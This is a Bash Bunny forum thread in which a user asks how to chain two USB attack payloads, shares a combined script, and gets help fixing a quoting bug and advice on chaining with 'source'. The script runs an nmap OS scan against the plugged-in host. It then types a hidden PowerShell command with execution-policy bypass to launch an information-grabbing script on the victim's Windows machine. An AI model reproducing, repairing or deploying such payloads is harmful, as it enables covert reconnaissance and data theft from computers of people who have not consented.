Jump to content

Is it possible to chain payloads?

Am3ience

By Am3ience
in Bash Bunny

 Share

Recommended Posts

Am3ience Newbie

Am3ience

Posted
Posted

Hi guys, another question. Is it possible to chain payloads one after another? Basically what I want to do is use the Nmapper Payload then the InfoGrabber payload right after the scan. They both go off correctly when done by themselves, but when I try to copy and paste the nmapper onto the InfoGrabber payload, nothing goes off. No LEDs or anything after the initial green. The code is below:

  

# See nmap --help for options. Default "-O --fuzzy" profiles target OS.
NMAP_OPTIONS="-O --fuzzy""
LOOTDIR=/root/udisk/loot/nmap

######## INITIALIZATION ########
LED SETUP
# Use RNDIS for Windows. Mac/Linux use ECM_ETHERNET
ATTACKMODE RNDIS_ETHERNET 
#ATTACKMODE ECM_ETHERNET
GET TARGET_IP
GET TARGET_HOSTNAME
GET SWITCH_POSITION

######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l)
COUNT=$((COUNT+1))

######## ERROR IF NO TARGET IP ########
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
	exit 1
fi

######## ATTACK ########
LED ATTACK
nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log

######################################################################################## Info Grab
ATTACKMODE HID STORAGE

LED SPECIAL
# Run the run.ps1 script in the BashBunny
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"

######## CLEANUP ########
LED CLEANUP
sync

######## FINISH ########
LED FINISH

 

Link to comment
Share on other sites
GermanNoob Newbie

GermanNoob

Posted
Posted

Hi there,

I didn't tried your payload but as the LED isn't turning on I had a deeper look at the first lines of your code:# 

NMAP_OPTIONS="-O --fuzzy""

Delete one quote at the end of the line. Bash will hang there...

Link to comment
Share on other sites
Am3ience Newbie

Am3ience

Posted
  • Author
Posted
2 hours ago, GermanNoob said:

Hi there,

I didn't tried your payload but as the LED isn't turning on I had a deeper look at the first lines of your code:# 


NMAP_OPTIONS="-O --fuzzy""

Delete one quote at the end of the line. Bash will hang there...

I love you, i can't believe I missed that

Link to comment
Share on other sites
Dave-ee Jones Newbie

Dave-ee Jones

Posted
Posted

Yes, it is definitely possible.

For example, you could simply source the shell script. 

source /PATH/TO/PAYLOAD/payload.txt

Keep in mind if you have something after it (as below) it will run that once the other payload is complete. 

echo "Starting second payload.."
source /PATH/TO/PAYLOAD/payload.txt
echo "Second payload is complete!"

Which comes with all the other bits and bobs like.. 

FIRST SCRIPT:
source secondscript.txt
echo "Hello $name"

SECOND SCRIPT:
name="Am3ience"

So you could check if the second script succeeded by checking for a variable. Some pretty interesting ideas and combinations you could do to make interesting payloads. :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...